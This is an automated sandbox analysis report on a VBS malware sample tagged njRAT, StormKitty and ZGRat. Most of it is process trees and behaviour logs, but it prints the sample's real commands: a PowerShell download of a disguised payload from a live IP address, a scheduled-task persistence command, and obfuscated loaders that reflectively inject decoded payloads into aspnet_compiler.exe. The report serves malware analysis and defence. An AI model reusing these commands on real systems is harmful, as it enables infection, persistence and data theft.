Malware Analysis Report

2024-10-18 21:24

Sample ID 240320-xsghmshc31
Target xt.vbs
SHA256 45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b
Tags
njrat stormkitty zgrat hacked by ms47 rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

45c1e9101141f68101337cd553cbdfdbb5d752423c350df39aab343d4312663b

Threat Level: Known bad

The file xt.vbs was found to be: Known bad.

Malicious Activity Summary

njrat stormkitty zgrat hacked by ms47 rat stealer trojan

StormKitty

ZGRat

StormKitty payload

njRAT/Bladabindi

Detect ZGRat V1

Downloads MZ/PE file

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-20 19:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-20 19:06

Reported

2024-03-20 19:14

Platform

win7-20240221-en

Max time kernel

361s

Max time network

362s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

Network

N/A

Files

memory/2784-5-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

memory/2784-4-0x000000001B690000-0x000000001B972000-memory.dmp

memory/2784-6-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

memory/2784-7-0x0000000002D10000-0x0000000002D90000-memory.dmp

memory/2784-8-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

memory/2784-9-0x0000000002D10000-0x0000000002D90000-memory.dmp

memory/2784-10-0x0000000002D10000-0x0000000002D90000-memory.dmp

memory/2784-11-0x0000000002D10000-0x0000000002D90000-memory.dmp

memory/2784-12-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-20 19:06

Reported

2024-03-20 19:18

Platform

win10v2004-20240226-en

Max time kernel

600s

Max time network

594s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

njRAT/Bladabindi

trojan njrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: 33 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 508 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 508 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 508 wrote to memory of 4652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 508 wrote to memory of 4652 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WScript.exe
PID 4652 wrote to memory of 2456 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 2456 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2456 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 1440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2456 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2456 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2456 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2456 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4940 wrote to memory of 2616 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4940 wrote to memory of 2616 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4772 wrote to memory of 5060 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4772 wrote to memory of 5060 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4772 wrote to memory of 3136 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 4772 wrote to memory of 3136 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 2616 wrote to memory of 3356 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 3356 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 3356 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3356 wrote to memory of 5008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3136 wrote to memory of 2308 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 3136 wrote to memory of 2308 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 5060 wrote to memory of 1584 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 5060 wrote to memory of 1584 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 2308 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2308 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 5008 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1660 wrote to memory of 2056 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 1660 wrote to memory of 2056 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 2056 wrote to memory of 880 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 2056 wrote to memory of 880 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 880 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3556 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 3644 wrote to memory of 2768 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 3644 wrote to memory of 2768 N/A C:\Windows\System32\WScript.exe C:\Users\Public\node.exe
PID 2768 wrote to memory of 1060 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 2768 wrote to memory of 1060 N/A C:\Users\Public\node.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1060 wrote to memory of 1452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1452 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1452 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1452 wrote to memory of 1380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1452 wrote to memory of 2320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xt.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://45.80.158.168:222/x.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v19.x/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\open.js"

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\get.js

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\get.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""

C:\Windows\system32\cmd.exe

